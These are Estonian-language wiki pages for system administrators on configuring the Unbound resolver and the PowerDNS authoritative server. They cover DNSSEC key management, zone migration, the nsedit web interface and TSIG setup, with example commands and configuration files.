name: "loomaaed.tartu.org"
stub-addr: 10.193.0.53

===IPv6 kasutamine===

IPv6 kasutamiseks tuleb seadistusfailis näidata, millisel IPv6 aadressil protsess kuulab

interface: 2001:1530:90:11:192::53

ning lubada asjakohastest võrkudest teenuse poole pöörduda, nt

access-control: fd99::/64 allow

Lisaks tuleb arvestada seda, et nimepäringute lahendamiseks kasutab Unbound ise IPv4 ja IPv6 võrku.

===2026 kevad märkused===

Takerdub

<pre>
# apt-get install unbound
root@arv:~# apt-get install unbound
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following additional packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound-anchor
The following NEW packages will be installed:
libfstrm0 libprotobuf-c1 libunbound2 unbound unbound-anchor
0 upgraded, 5 newly installed, 0 to remove and 49 not upgraded.
...

Setting up unbound (1.6.7-1ubuntu2.6+esm4) ...
Created symlink /etc/systemd/system/multi-user.target.wants/unbound.service → /lib/systemd/system/unbound.service.
Created symlink /etc/systemd/system/unbound.service.wants/unbound-resolvconf.service → /lib/systemd/system/unbound-resolvconf.service.
Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.

Job for unbound.service failed because the control process exited with error code.
See "systemctl status unbound.service" and "journalctl -xe" for details.
invoke-rc.d: initscript unbound, action "start" failed.
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (auto-restart) (Result: exit-code) since Tue 2026-06-16 11:21:17 EEST; 9ms ago
Docs: man:unbound(8)
Process: 5650 ExecStart=/usr/sbin/unbound -d $DAEMON_OPTS (code=exited, status=1/FAILURE)
Process: 5304 ExecStartPre=/usr/lib/unbound/package-helper root_trust_anchor_update (code=exited, status=0/SUCCESS)
Process: 5301 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Main PID: 5650 (code=exited, status=1/FAILURE)
Processing triggers for libc-bin (2.27-3ubuntu1.6+esm6) ...
Processing triggers for systemd (237-3ubuntu10.57+esm3) ...
Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root 5304 0.0 0.0 4636 896 ? Ss 11:20 0:00 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
unbound 5307 0.0 0.0 34596 7820 ? S 11:20 0:00 \_ /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v
</pre>

ning

<pre>
root@arv:~# systemctl status unbound
● unbound.service - Unbound DNS server
Loaded: loaded (/lib/systemd/system/unbound.service; enabled; vendor preset: enabled)
Active: activating (start-pre) since Tue 2026-06-16 11:33:15 EEST; 38s ago
Docs: man:unbound(8)
Process: 12287 ExecStartPre=/usr/lib/unbound/package-helper chroot_setup (code=exited, status=0/SUCCESS)
Cntrl PID: 12290 (package-helper)
Tasks: 2 (limit: 4915)
CGroup: /system.slice/unbound.service
├─12290 /bin/sh -e /usr/lib/unbound/package-helper root_trust_anchor_update
└─12293 /usr/sbin/unbound-anchor -a /var/lib/unbound/root.key -v

Jun 16 11:33:15 arv.auul.pri.ee systemd[1]: Starting Unbound DNS server...
</pre>

lahenduse koht

<pre>
root@arv:~# head -n 10 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.

root@arv:~# head -n 20 /usr/lib/unbound/package-helper
#!/bin/sh -e

UNBOUND_CONF="/etc/unbound/unbound.conf"
UNBOUND_BASE_DIR="$(dirname $UNBOUND_CONF)"
CHROOT_DIR="$(unbound-checkconf -o chroot)"

DNS_ROOT_KEY_FILE="/usr/share/dns/root.key"
ROOT_TRUST_ANCHOR_FILE="/var/lib/unbound/root.key"

# Override these variables by editing or creating /etc/default/unbound.
RESOLVCONF="true"
ROOT_TRUST_ANCHOR_UPDATE="true"

if [ -f /etc/default/unbound ]; then
. /etc/default/unbound

case "x$RESOLVCONF" in xfalse|x0|xno)
RESOLVCONF="false"
;;
esac
</pre>

t

<pre>
server:
interface: 127.0.0.1
port: 53
do-ip4: yes
do-ip6: no

access-control: 127.0.0.1/32 allow
module-config: "iterator"
verbosity: 1
use-syslog: yes
log-queries: yes

stub-zone:
name: "xxx.ee"
stub-addr: 192.168.1.111

forward-zone:
name: "."
forward-addr: 10.0.9.4
forward-addr: 10.0.9.5
</pre>

===Kasulikud lisamaterjalid===

* http://unbound.net/
* http://unbound.nlnetlabs.nl/pipermail/unbound-users/
* http://www.howtoforge.com/installing-using-unbound-nameserver-on-debian-etch
* http://www.nlnetlabs.nl/publications/dnssec_howto/index.html
* http://secspider.cs.ucla.edu/islands.html
* https://itar.iana.org/
* https://ns.iana.org/dnssec/status.html
* https://dlv.isc.org/
* http://en.wikipedia.org/wiki/AS112
* [[:Pädeva nimeserveri NSD kasutamine]]

PowerDNS Authoritative Server nimeserveri kasutamine

2026-06-17T11:03:37Z

Imre: /* Käsundamine */

===Sissejuhatus===

PowerDNS https://www.powerdns.com/ on üks populaarsetest vaba tarkvaralistest nn alternatiivsetest DNS serveritest, kuigi 'alternatiivse' kohta väidetavalt teda kasutatakse väga massiliselt DNSSEC jaoks. PowerDNS tarkvara võimaldab pidada täielist DNS infrastruktuuri, sh slave ja master pädevate nimeserverite erinevad konfiguratsioonid. PowerDNS tarkvara komplekti kuuluvad

* PowerDNS Authoritative Server - pädev nimeserver
* PowerDNS Recursor - rekursiivne nimeserver
* dnsdist - koormusjaotur

PowerDNS Authoritative Server tarkvaral on sellised tunnused

* võimalus kasutada andmete salvestamiseks erinevaid nn backend'isid (nn plain text, sql andmebaas, ldap kataloog jne)
* väga mugavalt korraldada DNSSEC tsooni pidamist
* DNSSEC puhul on PowerDNS tarkvarale iseloomulik, et kõik DNSSEC moodustatakse käigult, st midagi ei ole salvestatud (well, midagi puhverdatakse, aga rrsig moodi kirjeid jms ei hoita nö tsoonifaili kujul)
* tsoonide käsitlemine (tekitamine, sisu muutmine, eemaldamine) on võimalik üle nn API
* eksisteerivad mitmesugused veebipõhised tsoonide haldusliidesed (otse baasi ja üle API)
* ebamugav on kontrollida, kust tsooni kopeeritakse, kuhu notify saadetakse ja kust lubatakse tsooni kopeerida

Haldusliidesed jagunevad kaheks

* kirjutavad otse samasse sql baasi, mida kasutab PowerDNS ja tegelikult töötavadki ainult SQL backendide puhul - nt Poweradmin, http://www.poweradmin.org/
* suhtlevad PowerDNS'iga üle API, töötavad kõigi backendide puhul - nt nsedit, https://github.com/tuxis-ie/nsedit

Järgnevas tekstis öeldakse lühiduse mõttes PowerDNS ja mõeldakse PowerDNS Authoritative Server ehk pädevat komponenti.

===Tööpõhimõte===

PowerDNS tarkvara saab kasutada erinevates konfiguratsioonides

* nö suure pildi mõttes, nt PowerDNS on varjatud master ja avalikus võrgus teenindavad NSD nimeserverid (alternatiiv oleks pidada PowerDNS nimeserverit otse avalikus võrgus)
* PowerDNS enda komponentidest on välja valitud mingi komplekt, nt baas osa ja PostgreSQL backend (alternatiiv oleks BIND formaadis tekstifailid failisüsteemis)
* tsooniandmete haldamiseks kasutatakse käsurea utiliiti pdnsutil ja nsedit php rakendust

Käesolevas tekstis keskendutakse just mainitud konfiguratsioonile. Kui PowerDNS kasutab SQL backendi, siis avaliku pädeva DNS teenuse pakkumise juures tekitab see vähemalt esmapilgul kahtlusi. Võib olla on hea mõte tekitada varjatud masteriga lahendus

ans1 (NSD) ans2 (NSD)
_____ _____
| | | |
| | | |
|_____| port 8952 |_____| port 8952
| |
| |
----|---------------------|----------------------|----
|
__|__
| | nimetaja (PowerDNS)
| |
|_____|

kus

* ans1, ans2 - avalikud pädevad nimeserverid, tehniliselt slave'id
* nimetaja - varjatud pädev nimeserver, tehniliselt master
* üle port 8952 saab nsd protsessi eemalt juhtida (alternatiiv on juhtida nö tavalisel viisil, lokaalselt)

Käesolevas tekstis pööratakse NSD tarkvara kasutamisele tähelepanu minimaalselt. NSD tekst asub aadressil [[:Pädeva nimeserveri NSD v. 4 kasutamine operatsioonisüsteemiga Debian]].

===Tarkvara paigaldamine ja seadistamine===

Tarkvara paigaldamiseks on üldiselt kaks võimalust

* operatsioonisüsteemi paketihaldus
* PowerDNS repositoorium - https://repo.powerdns.com/

PowerDNS tarkvara on jaotatud komponentideks

* üldosa
* tsoonidega seotud andmete salvesamiseks erinevad backendid (failisüsteem, SQL andembaas jne)

Kui asutakse kasutama SQL backendi, siis võib olla otstarbekas enne PowerDNS vastava backendi paigaldamist baas ise paigaldada ja käivitada; nt nt see baas ei pruugi olla tingimata samas arvutis. Teisipidi, mugavam on samas arvutis, kuna sel juhul baasi saab lähtestada dbconfig süsteemi abil; lisaks, kui kasutatakse DNSSEC'i, siis arvestada, et krüptomaterjal asub baasis. Käesolevas tekstis paigaldatakse tarkvara PowerDNS repositooriumist kuna seal on alati kõige värskem.

====PostgreSQL andmebaasi ettevalmistamine====

PowerDNS tarkvara ei ole PostgreSQL andmebaasi versiooni suhtes nõudlik, tõenäoliselt sobib igasugune v. 9.x ja nt en_US.UTF-8 kodeering

# apt-get install postgresql

====Paigaldamine PowerDNS repositooriumist====

PowerDNS repositoorium asub aadressil https://repo.powerdns.com/ ja kasutamine (Debian v. 9 Stretch juhtumil)

# cat /etc/apt/sources.list.d/pdns.list
deb http://repo.powerdns.com/debian stretch-auth-master main

ning öelda

# curl https://repo.powerdns.com/CBC8B383-pub.asc | sudo apt-key add -
# apt-get update

Tarkvara paigaldamiseks öelda (paistab, et bind backend paigaldatakse lisaks paratamatult)

# apt-get install pdns-server pdns-backend-pgsql

seejuures on valik paigaldada baas db-config süsteemi abil ja see validagi. Tulemusena tekitatakse baasi baasi kasutaja, create database, initsiliseeritakse baasi sisu ning kirjeldatakse PowerDNS backend seadistus

# cat /etc/powerdns/pdns.d/pdns.local.gpgsql.conf
# PostgreSQL Configuration
#
# Launch gpgsql backend
launch+=gpgsql

# gpgsql parameters
gpgsql-host=127.0.0.1
gpgsql-port=
gpgsql-dbname=pdns
gpgsql-user=pdns
gpgsql-password=pdnsparool
gpgsql-dnssec=yes

Vaikimisi käivitatakse PowerDNS protsessid ning natuke saab asuda süsteemi kasutama

# pdns_control list-zones
All zonecount:0

Järgmisena tuleb PowerDNS server seadistada.

====Käsitsi baasi lähtestamine====

Kui db-config süsteemi mitte kasutada, sobib tekitada kasutaja ja create database andmebaas käsitsi

# su - postgres
$ psql
..
postgres=# create role pdns login password 'pdnsparool' NOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE;
postgres=# create database pdns owner = pdns;

ning seejärel laadida baasi sisu, õieti struktuur

# psql -h 127.0.0.1 -U pdns pdns < /usr/share/doc/pdns-backend-pgsql/schema.pgsql.sql

Lisaks peab olema seadistusfail /etc/powerdns/pdns.d/pdns.local.gpgsql.conf sobiva sisuga, vt. eelmist punkti.

===Tarkvara seadistamine===

Üldosa sobiks kokkuvõttes seadistada nt nii

# egrep -v "^$|^#" /etc/powerdns/pdns.conf
allow-axfr-ips=127.0.0.0/8,::1,192.168.1.210
also-notify=192.168.1.210
api=yes
api-key=midagisalajast123
default-soa-mail=hostmaster.moraal.ee.
default-soa-name=ans1.moraal.ee.
include-dir=/etc/powerdns/pdns.d
launch=
master=yes
only-notify=192.168.1.210
security-poll-suffix=
setgid=pdns
setuid=pdns
slave=yes
soa-expire-default=3600000
soa-minimum-ttl=3600
soa-refresh-default=86400
soa-retry-default=7200
webserver=yes
webserver-address=192.168.1.248
webserver-allow-from=0.0.0.0/0,::/0,192.168.10.0/24

kus

* allow-axfr-ips - millistelt ip aadressidelt on lubatud axfr
* also-notify - millistele ip aadressidel töötavatele nimeserveritele saata notify
* api* - api kasutamine (vajalik veebipõhise haldusliidese nsedit jaoks)
* default-soa-* - uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* only-notify - notify saadetakse ainult näidatud ip aadressidele (mitte tsoonifailides siselduvatele NS serveritele)
* soa-* uue tsooni sisu moodustamisel kasutatavad vaikeväärtused
* webserver* - powerdns sisemise veebiserveri ip aadress jms (saab uurida protsesside statistikat)

Muudatuste kehtestamiseks lõpetada ja käivitada pdns protsessid

# systemctl stop pdns
# systemctl start pdns

===Tsooni sisu haldamine käsurealt===

Tsooni sisu haldamine käsurealt toimub utiliidi pdnsutil abil. Uue tühja tsooni tekitamine (sisaldab SOA kirjet), seejärel tuleb vähemalt NS kirje tekitada (nb! nii tekib Native tüüpi tsoon)

# pdnsutil create-zone moraal.ee

Tulemuse küsimine

# pdnsutil show-zone moraal.ee

Tsooni Native -> Master teisendus

# pdnsutil set-kind moraal.ee master

Tsooni sisu esitamiseks

# pdnsutil list-zone moraal.ee

Sisu muutmiseks, sh muuta käsitsi SOA serial

# pdnsutil edit-zone moraal.ee

utiliidiga seriali suurendamiseks

# pdnsutil increase-serial moraal.ee

Tulemuse küsimine

# dig @127.0.0.1 moraal.ee axfr

Notify käsitsi välja saatmiseks

# pdns_control notify moraal.ee
Added to queue

Kirje lisamine (lisaks tuleb increase serial öelda)

# pdnsutil add-record moraal.ee imre5 A 300 "127.0.0.5"
Feb 21 10:20:54 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
New rrset:
imre5.moraal.ee. IN A 300 127.0.0.5

===Veebipõhine haldusliides nsedit===

Veebipõhiste haldusliideste abil saab

* tekitada ja kustutada tsoone, muuta tsoonide sisu
* loodetavasti haldusliidese abil jäävad tegemata mingid süntaksivead, mida on kerge teha nn BIND-ühilduvat tsoonifaili tavalise tekstieditoriga otse muutes
* tsooni sisu halduse saab usaldada mitte-vi/joe/nano ekspertiisiga inimesele

Paistab, et veebipõhiseid haldusliideseid on omajagu, https://github.com/PowerDNS/pdns/wiki/WebFrontends. nsedit on PHP rakendus. Märkused

* Tsoonis tehtud muudatustega kaasneb automaatselt SOA seriali suurenemine
* Veebiliideses tehtud muudatused ei kajastu alati sama veebiliideses koheselt (nt SOA seriali muutumine, välja ja sisselogimise järel on näha)
* nsedit esitab muudatuste logi
* toimib ipv6 jaoks
* nn õäöü tähti sisaldavaid nimesid sisestada otseselt ei saa
* rakenduse võib paigaldada http:// peale ja seejärel muuta veebiserveri seadistusi ning kasutada edasi https:// abil
* nsedit ei pea asuma samas arvutis PowerDNS serveriga, suhtlemine toimub üle võrgu ja kasutades API liidest

====Ettevalmistused====

nsedit kasutamise eelduseks on selline tarkvara

# apt-get install apache2 php git php-sqlite3 php-curl

====Paigaldamine ja seadistamine====

Kopeerida tarkvara, tundub, et 2017 aasta alguses on praktiline võtta git repo viimane ots

# cd /var/www/html
# git clone https://github.com/tuxis-ie/nsedit.git

Tekitada php skriptide jaoks kasutaja:grupp

# groupadd nsedit
# useradd -g nsedit -m -d /opt/nsedit -s /bin/false nsedit

Avades brauseris http://pdns.moraal.ee/nsedit küsitakse parooli, vaikimisi sobib admin ja admin mille järel

* kontrollitakse vajalike teekide olemasolu
* moodustatakse sqlite3 andmebaas

# sqlite3 /var/www/html/etc/pdns.users.sqlite3
..
sqlite> .tables
logs users zones

nsedit seadistatakse failis /var/www/html/nsedit/includes/config.inc.php

# cp includes/config.inc.php-dist includes/config.inc.php

* ühendust powerdns serveriga üle api juhib sektsioon

# cat /var/www/html/nsedit/includes/config.inc.php | grep '^$api'
$apipass = 'apiparool'; # The PowerDNS API-key
$apiip = '10.0.9.18'; # The IP of the PowerDNS API
$apiport = '8081'; # The port of the PowerDNS API
$apiproto = 'http'; # http | https
$apisslverify = FALSE; # Verify SSL Certificate if using https for apiproto

* vaikeväärtuste kasutamiset haldusliideses kontrollib

$defaults['soa_edit'] = 'INCEPTION-INCREMENT';
$defaults['soa_edit_api'] = 'INCEPTION-INCREMENT';
$defaults['defaulttype'] = 'Master'; # Choose between 'Native' or 'Master'
$defaults['ns'][0] = 'ns1.moraal.ee.'; # The value of the first NS-record
$defaults['ns'][1] = 'ns2.moraal.ee.'; # The value of the second NS-record
$defaults['ttl'] = 3600; # Default TTL for records
$defaults['disabled'] = false; # Default disabled state

Kasutajaliides paistab välja selline

[[Pilt:Pdns-1.gif]]

kus

* TODO

Kui rakendus töötab, muuta rakenduse failide omanik:grupp ära

# chown -R nsedit:nsedit /var/www/html/nsedit

====Kasutamine====

* Kasutajate lisamine, valida (ning märkida linnuke admin user jaoks), tulemusena on nsedit logid paremad

Users -> Add new user

* Uue tsooni lisamine, valida

Zones -> Add new zone

ning sisestada Domain lahtrisse domeeninimi, lõpetades punktiga, nt

test-1.ee.

Kõik muud valikud jätta vaikimisi

Account - admin
Type - master
Template - None

Kuna pdns serveri seadistusfailisis on näidatus SOA kirje väärtused ja nsedit seadisusfailis on kirjeldatud nimeserverid, siis tekib vaikimisi kastutatav tulemus.

* Uue tsooni lisamine kirjeldades korraga palju kirjeid (nt tsooni ületoomisel eelmise dns teenusepakkuja juurest)

Zones -> Import a new zone

seejuures

avanenud dialoogi pasteda tsoonifaili sisu
eemaldada SOA kirje
asendada NS kirjetesse õiged väärtused
kõik nimed (kirje kõige vasem positsioon) peavad olema pikad ja lõppema punktiga
eemaldada linnuke 'Overwrite Nameservers' juurest

* Mitme elemendilise väärtuse puhul tuleb see nii sisestada, nt MX kirje puhul

10 mx.moraal.ee.

* Eeldusel, et on olemas Content tulbas kasutatav A kirje ip aadressile vastav in-addr.arpa tsoon, saab nsedit abil tekitada automaatselt PTR kirje.

====Kasulikud lisamaterjalid====

* https://github.com/tuxis-ie/nsedit

===DNSSEC tsooni esmane juurutamine===

Tundub, et uuemal ajal saab DNSSEC juures kasatada CSK (Combined Signing Key) võtit ja seda kasutab PowerDNS vaikimisi, kuid samas CSK võtmeid registripidajad eriti ei toeta. Ja PowerDNS toetab ka nö klassikalist KSK+ZSK komplekti kasutamist.

====KSK ja ZSK võtmete kasutamine====

Võtmete tsooniga seostamiseks sobib öelda

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256
# pdnsutil add-zone-key moraal.ee zsk 1024 active rsasha256
# pdnsutil set-nsec3 moraal.ee '1 0 5 0...f'
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil set-meta moraal.ee SOA-EDIT INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil rectify-zone moraal.ee
# pdnsutil show-zone moraal.ee

mis

* tekitab võtmed
* kui set-meta kogemata vääratab, nt lisati SOA-EDIT-SOA, siis saab meta data eemaldada, st näitamata väärtust

# pdnsutil set-meta moraal.ee SOA-EDIT-SOA

* võtab kasutusele nsec3 hash'ide arvutamiseks vajaliku materjali (0-f on 16-elemendiline juhuslik hex järgnevus, mis saadake nt nii

$ head -c 512 /dev/urandom | sha1sum | cut -b 1-16
7bc59a6dd87fa477

ja ideaalis võiks seda regulaarselt muuta), nt

$ dig +short moraal.ee nsec3param
1 0 5 E7544BB6070C3E0F

(kus 1 - sha1, 0 - opt-out, 5 - iterations, E7544BB6070C3E0F - salt)

* INCEPTION-INCREMENT rida seadistab selliselt, et kui automaaselt tsooni andmed resigneeritakse, siis suurendatakse ka seriali (muidu ei toimu notify ja andmed ei jõua avalikesse pädevatesse nimeserveritesse)
* rectify tuleb põhimõtteliselt öelda peale iga tsooni muudatust, et olla täiesti kindel tsooni toimimises; kui PowerDNS kasutatakse avalike nimeserverite varjatud masterina, pole see probleem

ning tsooni andmed paistavad

# pdnsutil show-zone moraal.ee
Nov 06 23:49:44 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
This is a Master zone
Last SOA serial number we notified: 2016103003 == 2016103003 (serial in the database)
Metadata items:
SOA-EDIT INCEPTION-INCREMENT
SOA-EDIT-API INCEPTION-INCREMENT
Zone has NSEC3 semantics, configuration: 1 0 1 ab
keys:
ID = 11 (ZSK), flags = 256, tag = 26589, algo = 8, bits = 1024 Active ( RSASHA256 )
ID = 10 (KSK), flags = 257, tag = 53461, algo = 8, bits = 2048 Active ( RSASHA256 )
KSK DNSKEY = moraal.ee. IN DNSKEY 257 3 8 AwEAAcn... TQcnQstT+tU= ; ( RSASHA256 )
DS = moraal.ee. IN DS 53461 8 1 6c123b39076072da... c66f62b1e3c388b86b7f ; ( SHA1 digest )
DS = moraal.ee. IN DS 53461 8 2 b85dee98efa6e3bb... 57ce193f728f6b2b1d0dd262 ; ( SHA256 digest )
DS = moraal.ee. IN DS 53461 8 3 1359b0b2b97e60b2... 844b207e84bf5c109eb2e151 ; ( GOST R 34.11-94 digest )
DS = moraal.ee. IN DS 53461 8 4 6d735926cd5cf68b... 9ca2af1f72b3b8f67900bb32a94c ; ( SHA-384 digest )

kus

* kaks võtit, ID väärtustega 10 ja 11

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje (reeglina see õnnestub, aga nt 2017 aasta kevadel .org domeenide puhul on tulemuseks dnssec viga, tavaline servfail)
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

====Tulemuse kontrollimine====

Kui kõik juba töötab (ja on vist on vajalik, et kasutada on mõni dnssec-võimeline rekursiivne nimeserver), saab tulemust kontrollida nt nii

$ ldns-rrsig moraal.ee a
moraal.ee RRSIG(a): Thu Oct 27 00:00:00 2016 - Thu Nov 17 00:00:00 2016

====Märkused====

* DNSSEC RRSIG signatuure arvutatakse iga 2 nädala tagant üle selleks, et piirata replay attack võimalusi. Põhimõtteliselt saab pahalane päringule vastuseks saata mõne varasemalt võrgus olnud vastuse (st RRSet + RRSIG komplekti) eeldusel, et ta kontrollib kasutaja võrguliiklust. Tänu RRSIG piiratud kehtivusajale (nt 2 nädalat) saab ta seda teha mitte vanemate kui 2 nädalat andmetega, lisaks ta on piiratud saatma mitte suvalisi vastuseid, vaid viimase kahe nädala jooksul kasutuses olnud vastuseid.

====Kasulikud lisamaterjalid====

* https://blog.powerdns.com/2016/02/02/powerdns-authoritative-the-new-old-way-to-manage-domains/

====CSK võtme kasutamine====

Märkus 2016 lõpus: tundub, et see CSK on mingi tulevikutehnoloogia.

Olemasoleva tsooni jaoks DNSSEC sisselülitamiseks sobib öelda

# pdnsutil secure-zone moraal.ee
# pdnsutil set-nsec3 moraal.ee '1 0 1 ab'
# pdnsutil rectify-zone moraal.ee
# pdnsutil set-meta moraal.ee SOA-EDIT-API INCEPTION-INCREMENT
# pdnsutil increase-serial moraal.ee
# pdnsutil show-zone moraal.ee

Seejärel tuleb registripidajale öelda DS väärtus.

Tulemuse saab kontrollida nt aadressil http://dnsviz.net/d/moraal.ee/dnssec/.

DNSSEC eemaldamiseks tuleb

* esmalt eemaldada registripidaja juurest DS kirje
* tsoonis dnssec väljalülitamiseks sobib öelda

# pdnsutil disable-dnssec moraal.ee

Misc

* tagasi nsec peale viimiseks

# pdnsutil unset-nsec3 moraal.ee

===DNSSEC tsooni seostamine DS sissekande abil ülevalpool oleva tsooniga===

DNSSEC tsooni seostamiseks ülevalpool oleva tsooniga on vaja teada selliseid andmeid

* võtme silt
* võtme tüüp
* algoritm
* avalik võti (või DS mis on avaliku võtme räsi vms)

Need kõik on avalik info ja kättesaadavad domeeni pädevast nimeserverist, aga PowerDNS haldusutiliidiga saab selle küsida otsekoheselt

# pdnsutil show-zone moraal.ee

Ühesõnaga, kui ise kasutatakse PowerDNS'i või partner saadab need andmed, siis allpool toodud dig käsuga tegelemist pole tarvis läbi teha. Tulemust sobib kontrollida nt aadressil http://dnsviz.net/.

====zone.ee keskkonnas - .ee tsoonis====

Logida sisse oma kasutajaga ja valida vasakult paneelist 'Teenuste ülevaade', kõnelaluse tsooni juures pressida rohelist + märki DNSSEC tulbas. Avanenud uuel eraanil vajutada üleval sinist nuppu Aktiveeri (muutub roheliseks), vajutada võtmete nimekirjas + märki ja täita lahtrid

[[Pilt:Pdns-3.gif]]

kus

* võtme silt - (antud juhul 53461), selle saab teada päringu väjundist

$ dig @ns.auul.pri.ee moraal.ee dnskey rrsig | grep DNSKEY
moraal.ee. 10800 IN RRSIG DNSKEY 8 2 10800 20161208000000 20161117000000 53461 moraal.ee. rVy+HAzSKkTRv6...

* võtme tüüp - KSK
* algoritm - 8 (RSA-SHA256)
* avalik võti, selle saab teada päringu väljundist, alates Aw kuni tU= (võib sisaldada tühikuid nagu päringu vastuses on)

$ dig @ns.auul.pri.ee moraal.ee dnskey | grep 257
moraal.ee. 3600 IN DNSKEY 257 3 8 AwEAAcnmmnnOlkRfK9NDYEI6F ... SD6 TQcnQstT+tU=

Vajutada all nuppu Kinnita, muudatus kehtestub peaaegu koheselt (ehk minutite jooksul), aga kasutajaliideses öeldakse

DNSSEC kaitse domeenil MORAAL.EE
Hetkestaatus: DNSSEC on aktiveerimata
Eesootavad muutused: DNSSEC aktiveeritakse

Teha brauseris refresh ja peab olema domeenide nimekirjas DNSSEC tulbas + asemel kilbi kujutis. Edasi läheb nn 15 minutit kuni muudatus zone.ee juurest eestiinternet.ee juurde jõuab ning kehtestub ee. tld (top level domain) nimeserverites. Kontrolliks maksab küsida tld nimeserverilt ds kirjet

$ dig +short @ns.tld.ee moraal.ee ds
30607 8 2 EAC8A17DD2128573F08EE76C18B4AB01734467CD4A376768F5358B0C A2B9463F

====zone.ee keskkonnas - .org tsoonis====

[[Pilt:Pdns-6.gif]]

====GoDaddy keskkonnas====

TODO

===DNSSEC võtmete asendamine===

====ZSK====

====KSK====

KSK moodi võtme lisamiseks sobib öelda, selliselt võib tsooniga siduda ka enam kui kaks võtit

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Tsooniga seotud võtmed paistavad käsu väljundis

# pdnsutil show-zone moraal.ee

Tulemusena paistab dnsviz keskkonnas selline pilt

TODO

Tsooniga seotud võtme eemaldamiseks sobib öelda, kus ID on show-zone väljundist välja valitud võtme ID väärtus

# pdnsutil remove-zone-key moraal.ee ID

====Kasulikud lisamaterjalid====

* https://doc.powerdns.com/md/authoritative/howtos/#zsk-rollover

===Mitmesugused haldusprotseduurid===

====tsooni backend muutmine====

TODO

====tsooni toomine PowerDNS kontrolli alla====

Tsooni migreerimiseks suvalisest AXFR-võimelisest nimeserverist sobib

* kirjeldada PowerDNS peal slave

# pdnsutil create-slave-zone moraal.ee 10.0.6.15
Feb 21 22:09:52 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Creating slave zone 'moraal.ee', with master(s) '10.0.6.15:53'

* kopeerida andmed axfr abil üle, kopeerimist kiirendab

# pdns_control retrieve moraal.ee

* muuta PowerDNS tsooni jaoks masteriks, öeldes

SQL> UPDATE domains set type='MASTER' where type='SLAVE';

Kui allikaks on nt BIND ning tsoonifailis on kasutatud generate konstruktsiooni, siis need lahenduvad automaatselt ära

$GENERATE 1-255 $ IN CNAME $.1-255.40.184.10.in-addr.arpa.

Kasulikud lisamaterjalid

* https://doc.powerdns.com/md/authoritative/migration/

====dnssec tsooni toomine PowerDNS kontrolli alla====

Analoogiliselt eelmisele punktile, aga

* esmalt lülitada dnssec välja, kustutades DS kirje parent tsoonist ja oodates vähemalt DS kirje TTL aja enne järgmise punkti juurde asumist; seejärel on tsooni sisu endine st vanade võtmetega signeeritud andmestik
* tegevused eelmises punktis + uute võtmetega krüptimine
* asuda kasutama uute võtmetega krüptitud tsooni sisu, ja oodata nt 6 tundi
* juurutada parent tsoonis uus DS kirje

====dnssec tsooni toomine PowerDNS kontrolli alla OpenDNSSEC keskkonnast koos vana KSK krüptomaterjaliga====

Eeldusel, et OpenDNSSEC kasutab SoftHSM backendi saab KSK krüptomaterjalid eksportida ja taaskasutada. Ettevalmistuseks tuleb kõnealune tsoon muus osas tavalisel viisil kasutusele võtta. SoftHSM pealt krüptomaterjali eksportimiseks tuleb esmalt teha kindlaks kolm väärust

* SoftHSM label ja pin vaadata nt /etc/opendnssec/conf.xml failist
* kõnealuse tsooni ksk võtme id, vaadata KSK active realt tulp 'CKA_ID'

# ods-ksmutil key list -v

sobib öelda

# softhsm --export moraal.ee-ksk.pem --slot 0 --label "vaartus" --pin vaartus --id vaartus
The key pair has been written to moraal.ee-ksk.pem

teisendada nn BIND kujule

# softhsm-keyconv --tobind --in ksk.pem --name moraal.ee --ksk --algorithm RSASHA256
The private key has been written to Kmoraal.ee+008+09122.private
The public key has been written to Kmoraal.ee+008+09122.key

ning võtta kasutusele PowerDNS juures

# pdnsutil import-zone-key moraal.ee Kksk+008+53675.private active ksk

Edasi seadistatakse DNSSEC analoogliselt nagu seada ikka PowerDNS puhul seadistatakse. Kusjuures 'pdnsutil import-zone-key ...' tulemus on sarnane nagu oleks öeldud

# pdnsutil add-zone-key moraal.ee ksk 2048 active rsasha256

Kasulikud lisamaterjalid

* http://www.molnar-peter.hu/en/

====pdns-control utiliidi kasutamine====

PowerDNS kus on master tsoon saadab notify oma slavedele (nagu on tsoonifaili NS kirjetes kirjas)

# pdns_control notify <domain>

või näidatud ip aadressile

# pdns_control notify-host <domain> <ip-address>

===TSIG kasutamine===

Nimeserverite vahelise tsooniedastuse juures TSIG juurutamiseks tuleb esmalt tekitada võti

# pdnsutil generate-tsig-key from_dns_to_itm hmac-sha256
Generating new key with 64 bytes (this can take a while)
Nov 26 13:10:37 [bindbackend] Done parsing domains, 0 rejected, 0 new, 0 removed
Create new TSIG key from_dns_to_itm hmac-sha256 WLuS4o6CX35+yGerdHpl2h3+PDKt76rgam9rqkRg8N+fTP6cGtC6H17rDidKl7FzEu0fukg3apxnZUxdDRDhkQ==

kus

* TODO

